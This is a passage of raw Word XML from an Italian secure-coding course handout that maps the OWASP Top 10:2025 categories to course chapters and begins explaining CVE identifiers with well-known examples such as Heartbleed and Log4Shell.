        <w:t xml:space="preserve">4.5 Cosa tratteremo in questo corso, e cosa no</w:t>
      </w:r>
      <w:bookmarkEnd w:id="490"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ecco la mappa di copertura della OWASP Top 10:2025 nel nostro corso.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Categoria OWASP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Trattata nel corso</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Capitolo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Profondità</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A01 Broken Access Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">✅ Sì</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink w:anchor="ch_6" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="0563C1"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t xml:space="preserve">Cap. 6</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:hyperlink w:anchor="ch_10" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="0563C1"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t xml:space="preserve">Cap. 10</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Approfondita</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(capitolo cardine)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A02 Security Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">🟡 Cenni</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink w:anchor="ch_7" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="0563C1"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t xml:space="preserve">Cap. 7</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:hyperlink w:anchor="ch_8" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="0563C1"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t xml:space="preserve">Cap. 8</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Solo aspetti applicativi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A03 Software Supply Chain Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">✅ Sì</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink w:anchor="ch_9" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="0563C1"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t xml:space="preserve">Cap. 9</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Approfondita</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A04 Cryptographic Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">✅ Sì</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink w:anchor="ch_7" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="0563C1"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t xml:space="preserve">Cap. 7</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Approfondita</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A05 Injection — SQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">✅ Sì</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink w:anchor="ch_5" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="0563C1"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t xml:space="preserve">Cap. 5</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Approfondita</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(capitolo cardine)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A05 Injection — XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">✅ Sì</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink w:anchor="ch_8" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="0563C1"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t xml:space="preserve">Cap. 8</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Approfondita</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A06 Insecure Design</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">🟡 Trasversale</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">tutti</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Principi del </w:t>
            </w:r>
            <w:hyperlink w:anchor="ch_1" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="0563C1"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t xml:space="preserve">Cap. 1</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A07 Authentication Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">🟡 Cenni</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink w:anchor="ch_7" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="0563C1"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t xml:space="preserve">Cap. 7</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Solo password robuste</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A08 Integrity Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">🟡 Cenni</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink w:anchor="ch_9" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="0563C1"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t xml:space="preserve">Cap. 9</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Solo intersezione con supply chain</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A09 Logging &amp; Alerting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">🟡 Cenni</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink w:anchor="ch_2" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="0563C1"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t xml:space="preserve">Cap. 2</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve"> (norme)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Aspetti normativi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A10 Mishandling of Exceptions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">🟡 Trasversale</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink w:anchor="ch_1" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="0563C1"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t xml:space="preserve">Cap. 1</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve"> (fail secure)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Principi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le voci</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">🟡</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">non sono ignorate: vengono accennate nei capitoli pertinenti. Ma una trattazione approfondita richiede prerequisiti che si acquisiscono al</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">secondo anno</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(JWT e OAuth per A07, threat modeling STRIDE per A06, container e cloud security per A02, deserializzazione insicura per A08, sistemi SIEM per A09).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">💡</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Una osservazione onesta sulla scelta dei capitoli del corso.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">I quattro capitoli</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">cardine</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">del primo anno (5, 6, 7, 8) coprono insieme oltre il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">70% delle vulnerabilità reali</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">che vedrai in produzione, secondo i dati OWASP. Le tecniche che imparerai sono trasferibili a tutti gli altri linguaggi, framework e contesti. Studiare bene questi quattro è infinitamente più produttivo che studiare male tutti i dieci. La completezza arriva al secondo anno; la solidità si costruisce ora.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="194"/>
    <w:bookmarkStart w:id="198" w:name="X1c0c26d72c7e38759a4d9d77ee90dfc570ae79f"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="491" w:name="sec_4_6"/>
      <w:r>
        <w:t xml:space="preserve">4.6 CVE: gli identificatori unici delle vulnerabilità</w:t>
      </w:r>
      <w:bookmarkEnd w:id="491"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quando una vulnerabilità specifica viene scoperta in un software specifico, le viene assegnato un identificatore univoco, mondiale, permanente: il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">CVE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Common Vulnerabilities and Exposures</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="195" w:name="anatomia-di-un-cve"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Anatomia di un CVE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il formato è semplice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-AAAA-NNNN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, dove:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">AAAA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è l’anno in cui la vulnerabilità è stata</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">assegnata</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(non necessariamente quello della scoperta o della pubblicazione)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">NNNN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è un numero progressivo (può essere di 4, 5, 6 o più cifre)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Esempi famosi che hai già incontrato in questa dispensa:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1085"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2014-0160</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">—</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Heartbleed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, vulnerabilità in OpenSSL che permetteva di leggere la memoria del server (centinaia di migliaia di siti vulnerabili nel 2014)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1085"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2017-5638</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Apache Struts, sfruttata nel breach Equifax (</w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_1" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1085"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2019-10744</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Prototype Pollution in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">lodash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, libreria JavaScript usata ovunque</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1085"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2021-44228</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">—</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Log4Shell</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, vulnerabilità in Apache Log4j (CVSS 10.0) — vedremo nel </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_9" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 9</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1085"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2024-3094</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Backdoor in XZ Utils, scoperta nel 2024 (CVSS 10.0)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="195"/>
    <w:bookmarkStart w:id="196" w:name="chi-assegna-i-cve"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chi assegna i CVE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I CVE sono mantenuti dal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(mitre.org), una fondazione no-profit americana. MITRE non assegna direttamente tutti i CVE: ha autorizzato decine di organizzazioni nel mondo (chiamate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">CNA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
